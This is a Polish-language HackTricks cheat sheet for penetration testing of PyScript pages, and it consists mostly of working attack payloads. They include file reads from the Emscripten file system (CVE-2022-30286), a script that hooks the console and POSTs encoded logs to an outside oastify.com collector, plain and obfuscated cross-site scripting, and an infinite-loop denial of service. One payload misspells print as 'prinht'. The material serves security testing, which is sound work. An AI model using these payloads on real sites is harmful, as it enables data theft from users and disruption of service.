Pyscript

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Przewodnik po testowaniu penetracyjnym PyScript

PyScript to nowy framework opracowany do integracji Pythona z HTML, dzięki czemu można go używać razem z HTML. W tym arkuszu ściąg znajdziesz informacje, jak używać PyScript do celów testowania penetracyjnego.

Wyciek / Pobieranie plików z wirtualnego systemu plików Emscripten:

ID CVE: CVE-2022-30286 Kod:

<py-script>
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
out = fin.read()
print(out)
</py-script>

ID CVE: CVE-2022-30286 Kod:

<py-script>
x = "CyberGuy"
if x == "CyberGuy":
with open('/lib/python3.10/asyncio/tasks.py') as output:
contents = output.read()
print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>

Wynik:

Cross Site Scripting (Zwykłe)

Kod:

<py-script>
print("<img src=x onerror='alert(document.domain)'>")
</py-script>

Wynik:

Cross Site Scripting (Python Obfuscated)

Kod:

<py-script>
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"

print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
</py-script>

Wynik:

Cross Site Scripting (Obfuskacja JavaScript)

Kod:

<py-script>
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
</py-script>

Wynik:

Atak DoS (nieskończona pętla)

Kod:

<py-script>
while True:
print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
</py-script>

Wynik:

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated